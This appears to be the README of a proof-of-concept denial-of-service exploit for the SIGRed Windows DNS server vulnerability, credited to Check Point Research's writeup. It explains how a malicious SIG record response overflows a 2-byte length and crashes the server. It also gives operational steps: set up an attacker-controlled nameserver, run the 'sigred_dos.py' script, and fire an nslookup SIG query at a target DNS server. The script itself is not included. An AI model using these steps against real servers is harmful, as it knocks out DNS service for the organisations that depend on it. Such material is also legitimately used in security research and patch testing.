Credits for the bug are entirely down to Check Point Research (@_cpresearch_) who did an incredible writeup of this bug (props to @sagitz_ for the post) Their writeup can be found here.
This exploit was written by @maxpl0it
Quick summary of how it works:
- On the LAN you trigger a DNS request (more specifically, a request for the SIG records) for an evil domain (for example 9.evil_domain.com)
- This gets sent to the vulnerable Windows server's DNS server
- The vulnerable server sends a request to whatever DNS it forwards requests to (usually the standard Google IPs)
- The Google DNS responds with the nameservers for the evil domain
- The vulnerable server then acts as a DNS client and sends a request to the evil DNS server
- The evil server responds with a payload that overflows a 2-byte number, causing a smaller allocation to take place than is required
- The signature is copied over and things break (of course), crashing the vulnerable server's DNS server
- This exploit requires you to set up a domain with its own nameservers pointing to your server.
- Set up the server and run this script. It will listen on port 53 on both TCP and UDP
- If you get an error saying that the ports are busy, use netstat -pa to figure out what's listening on the domain ports (probably systemd-resolved) and disable + stop it. If nothing's listening on the server, make sure you killed all instances of this script before re-running.
For example, I ran python sigred_dos.py ibrokethe.net
to start the malicious DNS server
If you have access to the Windows server, you can configure a conditional forwarder to point ibrokethe.net to the IP address of the host running the script. This effectively skips steps 3 & 4 in the summary.
In order to trigger the vulnerability on the Windows DNS server, run nslookup -type=sig 9.your_domain_name_here dns_server_to_target
The subdomain '9' is indeed required here. You do not have to make any domain record changes for this since the script deals with it.
As an example: I ran nslookup -type=sig 9.ibrokethe.net 127.0.0.1
as I was running this on the server.